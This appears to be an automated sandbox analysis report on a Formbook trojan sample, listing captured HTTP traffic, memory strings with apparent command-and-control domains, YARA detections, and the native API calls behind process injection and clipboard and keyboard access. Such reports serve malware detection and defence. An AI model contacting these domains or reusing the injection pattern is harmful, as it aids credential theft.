            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding 
to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/e0nr/
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 0000000C.00000003.1799028301.0000000007BE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 0000000C.00000002.3107256962.0000000003F18000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003038000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.0000000025CF8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuk
            Source: netbtugc.exe, 0000000C.00000002.3109366430.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.0000000004560000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106679302.0000000003680000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0042C063 NtClose,4_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572B60 NtClose,LdrInitializeThunk,4_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035735C0 NtCreateMutant,LdrInitializeThunk,4_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03574340 NtSetContextThread,4_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03574650 NtSuspendThread,4_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BF0 NtAllocateVirtualMemory,4_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BE0 NtQueryValueKey,4_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572B80 NtQueryInformationFile,4_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572BA0 NtEnumerateValueKey,4_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AD0 NtReadFile,4_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AF0 NtWriteFile,4_2_03572AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572AB0 NtWaitForSingleObject,4_2_03572AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F60 NtCreateProcessEx,4_2_03572F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F30 NtCreateSection,4_2_03572F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FE0 NtCreateFile,4_2_03572FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572F90 NtProtectVirtualMemory,4_2_03572F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FB0 NtResumeThread,4_2_03572FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572FA0 NtQuerySection,4_2_03572FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572E30 NtWriteVirtualMemory,4_2_03572E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572EE0 NtQueueApcThread,4_2_03572EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572E80 NtReadVirtualMemory,4_2_03572E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572EA0 NtAdjustPrivilegesToken,4_2_03572EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D10 NtMapViewOfSection,4_2_03572D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D00 NtSetInformationFile,4_2_03572D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572D30 NtUnmapViewOfSection,4_2_03572D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DD0 NtDelayExecution,4_2_03572DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572DB0 NtEnumerateKey,4_2_03572DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C60 NtCreateKey,4_2_03572C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572C00 NtQueryInformationProcess,4_2_03572C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CC0 NtQueryVirtualMemory,4_2_03572CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CF0 NtOpenProcess,4_2_03572CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572CA0 NtQueryInformationToken,4_2_03572CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573010 NtOpenDirectoryObject,4_2_03573010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573090 NtSetValueKey,4_2_03573090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035739B0 NtGetContextThread,4_2_035739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573D70 NtOpenThread,4_2_03573D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03573D10 NtOpenProcessToken,4_2_03573D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03254340 NtSetContextThread,LdrInitializeThunk,12_2_03254340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03254650 NtSuspendThread,LdrInitializeThunk,12_2_03254650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252B60 NtClose,LdrInitializeThunk,12_2_03252B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03252BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03252BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03252BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AF0 NtWriteFile,LdrInitializeThunk,12_2_03252AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AD0 NtReadFile,LdrInitializeThunk,12_2_03252AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F30 NtCreateSection,LdrInitializeThunk,12_2_03252F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FB0 NtResumeThread,LdrInitializeThunk,12_2_03252FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FE0 NtCreateFile,LdrInitializeThunk,12_2_03252FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03252E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03252EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03252D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03252D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03252DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DD0 NtDelayExecution,LdrInitializeThunk,12_2_03252DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C60 NtCreateKey,LdrInitializeThunk,12_2_03252C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03252C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03252CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032535C0 NtCreateMutant,LdrInitializeThunk,12_2_032535C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032539B0 NtGetContextThread,LdrInitializeThunk,12_2_032539B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252B80 NtQueryInformationFile,12_2_03252B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252AB0 NtWaitForSingleObject,12_2_03252AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F60 NtCreateProcessEx,12_2_03252F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252FA0 NtQuerySection,12_2_03252FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252F90 NtProtectVirtualMemory,12_2_03252F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252E30 NtWriteVirtualMemory,12_2_03252E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252EA0 NtAdjustPrivilegesToken,12_2_03252EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252D00 NtSetInformationFile,12_2_03252D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252DB0 NtEnumerateKey,12_2_03252DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252C00 NtQueryInformationProcess,12_2_03252C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CF0 NtOpenProcess,12_2_03252CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03252CC0 NtQueryVirtualMemory,12_2_03252CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253010 NtOpenDirectoryObject,12_2_03253010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253090 NtSetValueKey,12_2_03253090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253D10 NtOpenProcessToken,12_2_03253D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03253D70 NtOpenThread,12_2_03253D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28CF0 NtCreateFile,12_2_00A28CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28E60 NtReadFile,12_2_00A28E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A28F50 NtDeleteFile,12_2_00A28F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A29000 NtClose,12_2_00A29000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A29160 NtAllocateVirtualMemory,12_2_00A29160
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004096A00_2_004096A0
